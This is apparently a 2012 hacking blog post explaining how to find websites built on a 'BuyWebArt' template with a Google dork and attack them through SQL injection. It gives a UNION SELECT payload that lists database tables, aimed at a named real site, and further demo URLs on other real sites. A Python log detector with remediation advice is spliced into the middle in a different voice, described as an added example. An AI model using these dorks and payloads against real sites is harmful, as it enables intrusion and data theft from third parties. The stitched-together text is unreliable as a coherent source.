Friday, 17 February 2012

BuyWebArt - SQLi Vulnerability



Assalamualaikum and greetings. Huhu, can't sleep again. Shall we learn some more?

1. Find a target website using this dork:

inurl:php?id= "graphic web design by BuyWebArt"

2. Open the chosen site and apply SQLi as shown below:
Example:

http://target.com/path/XXX.php?id=X&id=[SQLI DI SINI]

------- Legend -------
XXX = page name
X = page ID
-----------------------

4. Live Demo :
http://www.mudracard.com/send-gift-cards.php?id=8

Example (finding the tables):

http://www.mudracard.com/send-gift-cards.php?id=-8+union+select+1,2,group_concat(table_name),4,5,6,7,8+from+information_schema.tables+where+table_schema=database()-- 

---------- Legend -----------
GREEN = VULNERABLE LINK
RED = SQLI
--------------------------------
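
For defenders, the request shape shown above (a repeated `id` parameter, and a `union select` over `information_schema.tables` ending in a SQL comment) leaves a recognisable trace in web-server access logs. The following Python detector is an added example, not part of the original post; the log lines, hosts, addresses and rule names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (paths and addresses are made up).
SAMPLE_LOG = [
    '198.51.100.7 - - [17/Feb/2012:03:10:01 +0000] "GET /page.php?id=8 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [17/Feb/2012:03:10:09 +0000] "GET /page.php?id=-8+union+select+1,2,group_concat(table_name),4+from+information_schema.tables+where+table_schema=database()--+ HTTP/1.1" 200 6011',
    '203.0.113.20 - - [17/Feb/2012:03:11:30 +0000] "GET /page.php?id=8&id=9%20UNION/**/SELECT%201,2 HTTP/1.1" 200 5300',
    '203.0.113.21 - - [17/Feb/2012:03:12:02 +0000] "GET /news.php?title=student+union+elections HTTP/1.1" 200 4100',
]

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
RULES = {  # hypothetical rule names, matched against decoded parameter values
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "schema_enum": re.compile(r"\binformation_schema\.(?:tables|columns)\b"),
    "comment_tail": re.compile(r"(?:--|#)\s*$"),
}

def normalise(value):
    """Lower-case the value and turn inline SQL comments (/**/) into spaces."""
    return re.sub(r"/\*.*?\*/", " ", value.lower())

def inspect_request(target):
    """Return the sorted list of rule names triggered by one request target."""
    # parse_qsl decodes '+' and %xx, so encoded payloads are matched in clear text.
    pairs = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    hits = set()
    names = [key for key, _ in pairs]
    if len(names) != len(set(names)):  # same parameter sent twice (id=X&id=...)
        hits.add("duplicate_param")
    for _, value in pairs:
        text = normalise(value)
        hits.update(name for name, rx in RULES.items() if rx.search(text))
    return sorted(hits)

def scan(lines):
    """Map line index -> triggered rules, for lines with at least one hit."""
    findings = {}
    for i, line in enumerate(lines):
        m = REQUEST.search(line)
        if m and (hits := inspect_request(m.group(1))):
            findings[i] = hits
    return findings

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_LOG).items():
        print(idx, hits)
```

Pattern matching on logs only surfaces attempts; the fix on the application side is to bind `id` as a parameter in a prepared statement instead of concatenating it into the query.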

Other demos:
  • http://synergy-pune.com/page.php?id=german
  • http://www.youthejournalist.com/article.php?aid=3649&sid=19

Credit to Infamous from 1337day.com

That's all...
Assalamualaikum~~
Item Reviewed: BuyWebArt - SQLi Vulnerability Description: Rating: 5 Reviewed By Afif Zafri

© 2011 - Reaperz All rights reserved